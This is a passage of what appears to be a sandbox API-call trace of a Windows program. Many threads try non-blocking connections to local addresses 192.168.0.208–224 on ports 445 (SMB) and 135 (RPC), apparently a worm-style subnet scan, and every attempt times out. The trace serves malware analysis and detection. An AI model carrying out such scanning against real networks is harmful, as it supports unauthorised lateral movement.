argp=0x64eff34) returned 0 [0091.001] connect (s=0x8f0, name=0x64eff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.224"), namelen=16) returned -1 [0091.001] WSAGetLastError () returned 10035 [0091.001] select (in: nfds=0, readfds=0x0, writefds=0x64efd08, exceptfds=0x64efe10, timeout=0x64eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x64efd08, exceptfds=0x64efe10) returned 0 [0096.046] closesocket (s=0x8f0) returned 0 [0096.046] inet_addr (cp="192.168.0.224") returned 0xe000a8c0 [0096.046] htons (hostshort=0x87) returned 0x8700 [0096.046] socket (af=2, type=1, protocol=6) returned 0x8f0 [0096.047] ioctlsocket (in: s=0x8f0, cmd=-2147195266, argp=0x64eff34 | out: argp=0x64eff34) returned 0 [0096.047] connect (s=0x8f0, name=0x64eff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.224"), namelen=16) returned -1 [0096.047] WSAGetLastError () returned 10035 [0096.047] select (in: nfds=0, readfds=0x0, writefds=0x64efd08, exceptfds=0x64efe10, timeout=0x64eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x64efd08, exceptfds=0x64efe10) returned 0 [0101.099] closesocket (s=0x8f0) returned 0 [0101.100] RtlExitUserThread (Status=0x0) Thread: id = 90 os_tid = 0x358 [0090.869] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1fb19a0 [0090.869] free (_Block=0x1fb19a0) [0090.869] inet_addr (cp="192.168.0.223") returned 0xdf00a8c0 [0090.869] htons (hostshort=0x1bd) returned 0xbd01 [0090.869] socket (af=2, type=1, protocol=6) returned 0x8f8 [0091.002] ioctlsocket (in: s=0x8f8, cmd=-2147195266, argp=0x662ff34 | out: argp=0x662ff34) returned 0 [0091.002] connect (s=0x8f8, name=0x662ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.223"), namelen=16) returned -1 [0091.003] WSAGetLastError () returned 10035 [0091.003] select (in: nfds=0, readfds=0x0, writefds=0x662fd08, exceptfds=0x662fe10, timeout=0x662ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x662fd08, exceptfds=0x662fe10) returned 0 [0096.045] closesocket (s=0x8f8) returned 0 [0096.045] inet_addr (cp="192.168.0.223") returned 0xdf00a8c0 [0096.045] htons (hostshort=0x87) returned 0x8700 [0096.045] socket (af=2, type=1, protocol=6) returned 0x8f8 [0096.045] ioctlsocket (in: s=0x8f8, cmd=-2147195266, argp=0x662ff34 | out: argp=0x662ff34) returned 0 [0096.045] connect (s=0x8f8, name=0x662ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.223"), namelen=16) returned -1 [0096.046] WSAGetLastError () returned 10035 [0096.046] select (in: nfds=0, readfds=0x0, writefds=0x662fd08, exceptfds=0x662fe10, timeout=0x662ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x662fd08, exceptfds=0x662fe10) returned 0 [0101.101] closesocket (s=0x8f8) returned 0 [0101.102] RtlExitUserThread (Status=0x0) Thread: id = 91 os_tid = 0x834 [0090.869] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1fb1978 [0090.869] free (_Block=0x1fb1978) [0090.869] inet_addr (cp="192.168.0.222") returned 0xde00a8c0 [0090.869] htons (hostshort=0x1bd) returned 0xbd01 [0090.869] socket (af=2, type=1, protocol=6) returned 0x900 [0091.003] ioctlsocket (in: s=0x900, cmd=-2147195266, argp=0x676ff34 | out: argp=0x676ff34) returned 0 [0091.003] connect (s=0x900, name=0x676ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.222"), namelen=16) returned -1 [0091.004] WSAGetLastError () returned 10035 [0091.004] select (in: nfds=0, readfds=0x0, writefds=0x676fd08, exceptfds=0x676fe10, timeout=0x676ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x676fd08, exceptfds=0x676fe10) returned 0 [0096.043] closesocket (s=0x900) returned 0 [0096.044] inet_addr (cp="192.168.0.222") returned 0xde00a8c0 [0096.044] htons (hostshort=0x87) returned 0x8700 [0096.044] socket (af=2, type=1, protocol=6) returned 0x900 [0096.044] ioctlsocket (in: s=0x900, cmd=-2147195266, argp=0x676ff34 | out: argp=0x676ff34) returned 0 [0096.044] connect (s=0x900, name=0x676ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.222"), namelen=16) returned -1 [0096.044] WSAGetLastError () returned 10035 [0096.044] select (in: nfds=0, readfds=0x0, writefds=0x676fd08, exceptfds=0x676fe10, timeout=0x676ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x676fd08, exceptfds=0x676fe10) returned 0 [0101.103] closesocket (s=0x900) returned 0 [0101.103] RtlExitUserThread (Status=0x0) Thread: id = 92 os_tid = 0x824 [0090.870] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1fb1950 [0090.870] free (_Block=0x1fb1950) [0090.870] inet_addr (cp="192.168.0.221") returned 0xdd00a8c0 [0090.870] htons (hostshort=0x1bd) returned 0xbd01 [0090.870] socket (af=2, type=1, protocol=6) returned 0x908 [0091.004] ioctlsocket (in: s=0x908, cmd=-2147195266, argp=0x68aff34 | out: argp=0x68aff34) returned 0 [0091.004] connect (s=0x908, name=0x68aff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.221"), namelen=16) returned -1 [0091.005] WSAGetLastError () returned 10035 [0091.005] select (in: nfds=0, readfds=0x0, writefds=0x68afd08, exceptfds=0x68afe10, timeout=0x68aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x68afd08, exceptfds=0x68afe10) returned 0 [0096.025] closesocket (s=0x908) returned 0 [0096.025] inet_addr (cp="192.168.0.221") returned 0xdd00a8c0 [0096.025] htons (hostshort=0x87) returned 0x8700 [0096.025] socket (af=2, type=1, protocol=6) returned 0x908 [0096.043] ioctlsocket (in: s=0x908, cmd=-2147195266, argp=0x68aff34 | out: argp=0x68aff34) returned 0 [0096.043] connect (s=0x908, name=0x68aff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.221"), namelen=16) returned -1 [0096.043] WSAGetLastError () returned 10035 [0096.043] select (in: nfds=0, readfds=0x0, writefds=0x68afd08, exceptfds=0x68afe10, timeout=0x68aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x68afd08, exceptfds=0x68afe10) returned 0 [0101.104] closesocket (s=0x908) returned 0 [0101.105] RtlExitUserThread (Status=0x0) Thread: id = 93 os_tid = 0x854 [0090.870] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1fb1928 [0090.870] free (_Block=0x1fb1928) [0090.870] inet_addr (cp="192.168.0.220") returned 0xdc00a8c0 [0090.870] htons (hostshort=0x1bd) returned 0xbd01 [0090.870] socket (af=2, type=1, protocol=6) returned 0x910 [0091.005] ioctlsocket (in: s=0x910, cmd=-2147195266, argp=0x69eff34 | out: argp=0x69eff34) returned 0 [0091.005] connect (s=0x910, name=0x69eff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.220"), namelen=16) returned -1 [0091.006] WSAGetLastError () returned 10035 [0091.006] select (in: nfds=0, readfds=0x0, writefds=0x69efd08, exceptfds=0x69efe10, timeout=0x69eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x69efd08, exceptfds=0x69efe10) returned 0 [0096.023] closesocket (s=0x910) returned 0 [0096.024] inet_addr (cp="192.168.0.220") returned 0xdc00a8c0 [0096.024] htons (hostshort=0x87) returned 0x8700 [0096.024] socket (af=2, type=1, protocol=6) returned 0x910 [0096.024] ioctlsocket (in: s=0x910, cmd=-2147195266, argp=0x69eff34 | out: argp=0x69eff34) returned 0 [0096.024] connect (s=0x910, name=0x69eff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.220"), namelen=16) returned -1 [0096.024] WSAGetLastError () returned 10035 [0096.024] select (in: nfds=0, readfds=0x0, writefds=0x69efd08, exceptfds=0x69efe10, timeout=0x69eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x69efd08, exceptfds=0x69efe10) returned 0 [0101.067] closesocket (s=0x910) returned 0 [0101.067] RtlExitUserThread (Status=0x0) Thread: id = 94 os_tid = 0x814 [0090.871] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1fb1900 [0090.871] free (_Block=0x1fb1900) [0090.871] inet_addr (cp="192.168.0.219") returned 0xdb00a8c0 [0090.871] htons (hostshort=0x1bd) returned 0xbd01 [0090.871] socket (af=2, type=1, protocol=6) returned 0x918 [0091.006] ioctlsocket (in: s=0x918, cmd=-2147195266, argp=0x6b2ff34 | out: argp=0x6b2ff34) returned 0 [0091.006] connect (s=0x918, name=0x6b2ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.219"), namelen=16) returned -1 [0091.007] WSAGetLastError () returned 10035 [0091.007] select (in: nfds=0, readfds=0x0, writefds=0x6b2fd08, exceptfds=0x6b2fe10, timeout=0x6b2ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x6b2fd08, exceptfds=0x6b2fe10) returned 0 [0096.022] closesocket (s=0x918) returned 0 [0096.022] inet_addr (cp="192.168.0.219") returned 0xdb00a8c0 [0096.022] htons (hostshort=0x87) returned 0x8700 [0096.023] socket (af=2, type=1, protocol=6) returned 0x918 [0096.023] ioctlsocket (in: s=0x918, cmd=-2147195266, argp=0x6b2ff34 | out: argp=0x6b2ff34) returned 0 [0096.023] connect (s=0x918, name=0x6b2ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.219"), namelen=16) returned -1 [0096.023] WSAGetLastError () returned 10035 [0096.023] select (in: nfds=0, readfds=0x0, writefds=0x6b2fd08, exceptfds=0x6b2fe10, timeout=0x6b2ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x6b2fd08, exceptfds=0x6b2fe10) returned 0 [0101.068] closesocket (s=0x918) returned 0 [0101.069] RtlExitUserThread (Status=0x0) Thread: id = 95 os_tid = 0x80c [0090.871] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1fb18d8 [0090.871] free (_Block=0x1fb18d8) [0090.871] inet_addr (cp="192.168.0.218") returned 0xda00a8c0 [0090.871] htons (hostshort=0x1bd) returned 0xbd01 [0090.871] socket (af=2, type=1, protocol=6) returned 0x920 [0091.008] ioctlsocket (in: s=0x920, cmd=-2147195266, argp=0x6c6ff34 | out: argp=0x6c6ff34) returned 0 [0091.008] connect (s=0x920, name=0x6c6ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.218"), namelen=16) returned -1 [0091.008] WSAGetLastError () returned 10035 [0091.009] select (in: nfds=0, readfds=0x0, writefds=0x6c6fd08, exceptfds=0x6c6fe10, timeout=0x6c6ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x6c6fd08, exceptfds=0x6c6fe10) returned 0 [0096.020] closesocket (s=0x920) returned 0 [0096.021] inet_addr (cp="192.168.0.218") returned 0xda00a8c0 [0096.021] htons (hostshort=0x87) returned 0x8700 [0096.021] socket (af=2, type=1, protocol=6) returned 0x920 [0096.021] ioctlsocket (in: s=0x920, cmd=-2147195266, argp=0x6c6ff34 | out: argp=0x6c6ff34) returned 0 [0096.021] connect (s=0x920, name=0x6c6ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.218"), namelen=16) returned -1 [0096.022] WSAGetLastError () returned 10035 [0096.022] select (in: nfds=0, readfds=0x0, writefds=0x6c6fd08, exceptfds=0x6c6fe10, timeout=0x6c6ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x6c6fd08, exceptfds=0x6c6fe10) returned 0 [0101.069] closesocket (s=0x920) returned 0 [0101.070] RtlExitUserThread (Status=0x0) Thread: id = 96 os_tid = 0x874 [0090.871] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073f00 [0090.871] free (_Block=0x2073f00) [0090.872] inet_addr (cp="192.168.0.217") returned 0xd900a8c0 [0090.872] htons (hostshort=0x1bd) returned 0xbd01 [0090.872] socket (af=2, type=1, protocol=6) returned 0x928 [0091.009] ioctlsocket (in: s=0x928, cmd=-2147195266, argp=0x6daff34 | out: argp=0x6daff34) returned 0 [0091.009] connect (s=0x928, name=0x6daff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.217"), namelen=16) returned -1 [0091.010] WSAGetLastError () returned 10035 [0091.010] select (in: nfds=0, readfds=0x0, writefds=0x6dafd08, exceptfds=0x6dafe10, timeout=0x6daff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x6dafd08, exceptfds=0x6dafe10) returned 0 [0096.019] closesocket (s=0x928) returned 0 [0096.020] inet_addr (cp="192.168.0.217") returned 0xd900a8c0 [0096.020] htons (hostshort=0x87) returned 0x8700 [0096.020] socket (af=2, type=1, protocol=6) returned 0x928 [0096.020] ioctlsocket (in: s=0x928, cmd=-2147195266, argp=0x6daff34 | out: argp=0x6daff34) returned 0 [0096.020] connect (s=0x928, name=0x6daff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.217"), namelen=16) returned -1 [0096.020] WSAGetLastError () returned 10035 [0096.020] select (in: nfds=0, readfds=0x0, writefds=0x6dafd08, exceptfds=0x6dafe10, timeout=0x6daff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x6dafd08, exceptfds=0x6dafe10) returned 0 [0101.071] closesocket (s=0x928) returned 0 [0101.072] RtlExitUserThread (Status=0x0) Thread: id = 97 os_tid = 0xbb0 [0090.872] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073ed8 [0090.872] free (_Block=0x2073ed8) [0090.872] inet_addr (cp="192.168.0.216") returned 0xd800a8c0 [0090.872] htons (hostshort=0x1bd) returned 0xbd01 [0090.872] socket (af=2, type=1, protocol=6) returned 0x930 [0091.010] ioctlsocket (in: s=0x930, cmd=-2147195266, argp=0x6eeff34 | out: argp=0x6eeff34) returned 0 [0091.011] connect (s=0x930, name=0x6eeff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.216"), namelen=16) returned -1 [0091.011] WSAGetLastError () returned 10035 [0091.011] select (in: nfds=0, readfds=0x0, writefds=0x6eefd08, exceptfds=0x6eefe10, timeout=0x6eeff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x6eefd08, exceptfds=0x6eefe10) returned 0 [0096.018] closesocket (s=0x930) returned 0 [0096.018] inet_addr (cp="192.168.0.216") returned 0xd800a8c0 [0096.018] htons (hostshort=0x87) returned 0x8700 [0096.018] socket (af=2, type=1, protocol=6) returned 0x930 [0096.018] ioctlsocket (in: s=0x930, cmd=-2147195266, argp=0x6eeff34 | out: argp=0x6eeff34) returned 0 [0096.018] connect (s=0x930, name=0x6eeff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.216"), namelen=16) returned -1 [0096.019] WSAGetLastError () returned 10035 [0096.019] select (in: nfds=0, readfds=0x0, writefds=0x6eefd08, exceptfds=0x6eefe10, timeout=0x6eeff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x6eefd08, exceptfds=0x6eefe10) returned 0 [0101.073] closesocket (s=0x930) returned 0 [0101.073] RtlExitUserThread (Status=0x0) Thread: id = 98 os_tid = 0x884 [0090.872] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073eb0 [0090.872] free (_Block=0x2073eb0) [0090.872] inet_addr (cp="192.168.0.215") returned 0xd700a8c0 [0090.873] htons (hostshort=0x1bd) returned 0xbd01 [0090.873] socket (af=2, type=1, protocol=6) returned 0x938 [0091.012] ioctlsocket (in: s=0x938, cmd=-2147195266, argp=0x702ff34 | out: argp=0x702ff34) returned 0 [0091.012] connect (s=0x938, name=0x702ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.215"), namelen=16) returned -1 [0091.014] WSAGetLastError () returned 10035 [0091.014] select (in: nfds=0, readfds=0x0, writefds=0x702fd08, exceptfds=0x702fe10, timeout=0x702ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x702fd08, exceptfds=0x702fe10) returned 0 [0096.016] closesocket (s=0x938) returned 0 [0096.017] inet_addr (cp="192.168.0.215") returned 0xd700a8c0 [0096.017] htons (hostshort=0x87) returned 0x8700 [0096.017] socket (af=2, type=1, protocol=6) returned 0x938 [0096.017] ioctlsocket (in: s=0x938, cmd=-2147195266, argp=0x702ff34 | out: argp=0x702ff34) returned 0 [0096.017] connect (s=0x938, name=0x702ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.215"), namelen=16) returned -1 [0096.017] WSAGetLastError () returned 10035 [0096.017] select (in: nfds=0, readfds=0x0, writefds=0x702fd08, exceptfds=0x702fe10, timeout=0x702ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x702fd08, exceptfds=0x702fe10) returned 0 [0101.074] closesocket (s=0x938) returned 0 [0101.075] RtlExitUserThread (Status=0x0) Thread: id = 99 os_tid = 0xa30 [0090.873] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073e88 [0090.873] free (_Block=0x2073e88) [0090.873] inet_addr (cp="192.168.0.214") returned 0xd600a8c0 [0090.873] htons (hostshort=0x1bd) returned 0xbd01 [0090.873] socket (af=2, type=1, protocol=6) returned 0x940 [0091.015] ioctlsocket (in: s=0x940, cmd=-2147195266, argp=0x716ff34 | out: argp=0x716ff34) returned 0 [0091.015] connect (s=0x940, name=0x716ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.214"), namelen=16) returned -1 [0091.015] WSAGetLastError () returned 10035 [0091.015] select (in: nfds=0, readfds=0x0, writefds=0x716fd08, exceptfds=0x716fe10, timeout=0x716ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x716fd08, exceptfds=0x716fe10) returned 0 [0096.015] closesocket (s=0x940) returned 0 [0096.016] inet_addr (cp="192.168.0.214") returned 0xd600a8c0 [0096.016] htons (hostshort=0x87) returned 0x8700 [0096.016] socket (af=2, type=1, protocol=6) returned 0x940 [0096.016] ioctlsocket (in: s=0x940, cmd=-2147195266, argp=0x716ff34 | out: argp=0x716ff34) returned 0 [0096.016] connect (s=0x940, name=0x716ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.214"), namelen=16) returned -1 [0096.016] WSAGetLastError () returned 10035 [0096.016] select (in: nfds=0, readfds=0x0, writefds=0x716fd08, exceptfds=0x716fe10, timeout=0x716ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x716fd08, exceptfds=0x716fe10) returned 0 [0101.076] closesocket (s=0x940) returned 0 [0101.076] RtlExitUserThread (Status=0x0) Thread: id = 100 os_tid = 0xba4 [0090.873] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073e60 [0090.873] free (_Block=0x2073e60) [0090.873] inet_addr (cp="192.168.0.213") returned 0xd500a8c0 [0090.873] htons (hostshort=0x1bd) returned 0xbd01 [0090.873] socket (af=2, type=1, protocol=6) returned 0x948 [0091.016] ioctlsocket (in: s=0x948, cmd=-2147195266, argp=0x72aff34 | out: argp=0x72aff34) returned 0 [0091.016] connect (s=0x948, name=0x72aff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.213"), namelen=16) returned -1 [0091.017] WSAGetLastError () returned 10035 [0091.017] select (in: nfds=0, readfds=0x0, writefds=0x72afd08, exceptfds=0x72afe10, timeout=0x72aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x72afd08, exceptfds=0x72afe10) returned 0 [0096.065] closesocket (s=0x948) returned 0 [0096.066] inet_addr (cp="192.168.0.213") returned 0xd500a8c0 [0096.066] htons (hostshort=0x87) returned 0x8700 [0096.066] socket (af=2, type=1, protocol=6) returned 0x948 [0096.066] ioctlsocket (in: s=0x948, cmd=-2147195266, argp=0x72aff34 | out: argp=0x72aff34) returned 0 [0096.066] connect (s=0x948, name=0x72aff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.213"), namelen=16) returned -1 [0096.066] WSAGetLastError () returned 10035 [0096.066] select (in: nfds=0, readfds=0x0, writefds=0x72afd08, exceptfds=0x72afe10, timeout=0x72aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x72afd08, exceptfds=0x72afe10) returned 0 [0101.106] closesocket (s=0x948) returned 0 [0101.107] RtlExitUserThread (Status=0x0) Thread: id = 101 os_tid = 0xba0 [0090.874] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073e38 [0090.874] free (_Block=0x2073e38) [0090.874] inet_addr (cp="192.168.0.212") returned 0xd400a8c0 [0090.874] htons (hostshort=0x1bd) returned 0xbd01 [0090.874] socket (af=2, type=1, protocol=6) returned 0x950 [0091.017] ioctlsocket (in: s=0x950, cmd=-2147195266, argp=0x73eff34 | out: argp=0x73eff34) returned 0 [0091.017] connect (s=0x950, name=0x73eff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.212"), namelen=16) returned -1 [0091.018] WSAGetLastError () returned 10035 [0091.018] select (in: nfds=0, readfds=0x0, writefds=0x73efd08, exceptfds=0x73efe10, timeout=0x73eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x73efd08, exceptfds=0x73efe10) returned 0 [0096.063] closesocket (s=0x950) returned 0 [0096.064] inet_addr (cp="192.168.0.212") returned 0xd400a8c0 [0096.064] htons (hostshort=0x87) returned 0x8700 [0096.064] socket (af=2, type=1, protocol=6) returned 0x950 [0096.065] ioctlsocket (in: s=0x950, cmd=-2147195266, argp=0x73eff34 | out: argp=0x73eff34) returned 0 [0096.065] connect (s=0x950, name=0x73eff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.212"), namelen=16) returned -1 [0096.065] WSAGetLastError () returned 10035 [0096.065] select (in: nfds=0, readfds=0x0, writefds=0x73efd08, exceptfds=0x73efe10, timeout=0x73eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x73efd08, exceptfds=0x73efe10) returned 0 [0101.107] closesocket (s=0x950) returned 0 [0101.108] RtlExitUserThread (Status=0x0) Thread: id = 102 os_tid = 0xae8 [0090.874] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073e10 [0090.874] free (_Block=0x2073e10) [0090.874] inet_addr (cp="192.168.0.211") returned 0xd300a8c0 [0090.874] htons (hostshort=0x1bd) returned 0xbd01 [0090.874] socket (af=2, type=1, protocol=6) returned 0x958 [0091.018] ioctlsocket (in: s=0x958, cmd=-2147195266, argp=0x752ff34 | out: argp=0x752ff34) returned 0 [0091.018] connect (s=0x958, name=0x752ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.211"), namelen=16) returned -1 [0091.019] WSAGetLastError () returned 10035 [0091.019] select (in: nfds=0, readfds=0x0, writefds=0x752fd08, exceptfds=0x752fe10, timeout=0x752ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x752fd08, exceptfds=0x752fe10) returned 0 [0096.062] closesocket (s=0x958) returned 0 [0096.062] inet_addr (cp="192.168.0.211") returned 0xd300a8c0 [0096.063] htons (hostshort=0x87) returned 0x8700 [0096.063] socket (af=2, type=1, protocol=6) returned 0x958 [0096.063] ioctlsocket (in: s=0x958, cmd=-2147195266, argp=0x752ff34 | out: argp=0x752ff34) returned 0 [0096.063] connect (s=0x958, name=0x752ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.211"), namelen=16) returned -1 [0096.063] WSAGetLastError () returned 10035 [0096.063] select (in: nfds=0, readfds=0x0, writefds=0x752fd08, exceptfds=0x752fe10, timeout=0x752ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x752fd08, exceptfds=0x752fe10) returned 0 [0101.109] closesocket (s=0x958) returned 0 [0101.110] RtlExitUserThread (Status=0x0) Thread: id = 103 os_tid = 0xb18 [0090.875] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073de8 [0090.875] free (_Block=0x2073de8) [0090.875] inet_addr (cp="192.168.0.210") returned 0xd200a8c0 [0090.875] htons (hostshort=0x1bd) returned 0xbd01 [0090.875] socket (af=2, type=1, protocol=6) returned 0x960 [0091.019] ioctlsocket (in: s=0x960, cmd=-2147195266, argp=0x766ff34 | out: argp=0x766ff34) returned 0 [0091.019] connect (s=0x960, name=0x766ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.210"), namelen=16) returned -1 [0091.020] WSAGetLastError () returned 10035 [0091.020] select (in: nfds=0, readfds=0x0, writefds=0x766fd08, exceptfds=0x766fe10, timeout=0x766ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x766fd08, exceptfds=0x766fe10) returned 0 [0096.060] closesocket (s=0x960) returned 0 [0096.061] inet_addr (cp="192.168.0.210") returned 0xd200a8c0 [0096.061] htons (hostshort=0x87) returned 0x8700 [0096.061] socket (af=2, type=1, protocol=6) returned 0x960 [0096.061] ioctlsocket (in: s=0x960, cmd=-2147195266, argp=0x766ff34 | out: argp=0x766ff34) returned 0 [0096.061] connect (s=0x960, name=0x766ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.210"), namelen=16) returned -1 [0096.062] WSAGetLastError () returned 10035 [0096.062] select (in: nfds=0, readfds=0x0, writefds=0x766fd08, exceptfds=0x766fe10, timeout=0x766ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x766fd08, exceptfds=0x766fe10) returned 0 [0101.111] closesocket (s=0x960) returned 0 [0101.112] RtlExitUserThread (Status=0x0) Thread: id = 104 os_tid = 0xb10 [0090.875] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073dc0 [0090.875] free (_Block=0x2073dc0) [0090.875] inet_addr (cp="192.168.0.209") returned 0xd100a8c0 [0090.875] htons (hostshort=0x1bd) returned 0xbd01 [0090.875] socket (af=2, type=1, protocol=6) returned 0x968 [0091.021] ioctlsocket (in: s=0x968, cmd=-2147195266, argp=0x77aff34 | out: argp=0x77aff34) returned 0 [0091.021] connect (s=0x968, name=0x77aff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.209"), namelen=16) returned -1 [0091.021] WSAGetLastError () returned 10035 [0091.021] select (in: nfds=0, readfds=0x0, writefds=0x77afd08, exceptfds=0x77afe10, timeout=0x77aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x77afd08, exceptfds=0x77afe10) returned 0 [0096.059] closesocket (s=0x968) returned 0 [0096.060] inet_addr (cp="192.168.0.209") returned 0xd100a8c0 [0096.060] htons (hostshort=0x87) returned 0x8700 [0096.060] socket (af=2, type=1, protocol=6) returned 0x968 [0096.060] ioctlsocket (in: s=0x968, cmd=-2147195266, argp=0x77aff34 | out: argp=0x77aff34) returned 0 [0096.060] connect (s=0x968, name=0x77aff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.209"), namelen=16) returned -1 [0096.060] WSAGetLastError () returned 10035 [0096.060] select (in: nfds=0, readfds=0x0, writefds=0x77afd08, exceptfds=0x77afe10, timeout=0x77aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x77afd08, exceptfds=0x77afe10) returned 0 [0101.112] closesocket (s=0x968) returned 0 [0101.113] RtlExitUserThread (Status=0x0) Thread: id = 105 os_tid = 0x560 [0090.875] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073d98 [0090.875] free (_Block=0x2073d98) [0090.875] inet_addr (cp="192.168.0.208") returned 0xd000a8c0 [0090.875] htons (hostshort=0x1bd) returned 0xbd01 [0090.876] socket (af=2, type=1, protocol=6) returned 0x970 [0091.022] ioctlsocket (in: s=0x970, cmd=-2147195266, argp=0x78eff34 | out: argp=0x78eff34) returned 0 [0091.022] connect (s=0x970, name=0x78eff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.208"), namelen=16) returned -1 [0091.022] WSAGetLastError () returned 10035 [0091.022] select (in: nfds=0, readfds=0x0, writefds=0x78efd08, exceptfds=0x78efe10, timeout=0x78eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x78efd08, exceptfds=0x78efe10) returned 0 [0096.058] closesocket (s=0x970) returned 0 [0096.059] inet_addr (cp="192.168.0.208") returned 0xd000a8c0 [0096.059] htons (hostshort=0x87) returned 0x8700 [0096.059] socket (af=2, type=1, protocol=6) returned 0x970 [0096.059] ioctlsocket (in: s=0x970, cmd=-2147195266, argp=0x78eff34 | out: argp=0x78eff34) returned 0 [0096.059] connect (s=0x970, name=0x78eff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.208"), namelen=16) returned -1 [0096.059] WSAGetLastError () returned 10035 [0096.059] select (in: nfds=0, readfds=0x0, writefds=0x78efd08, exceptfds=0x78efe10, timeout=0x78eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x78efd08, exceptfds=0x78efe10) returned 0 [0101.114] closesocket (s=0x970) returned 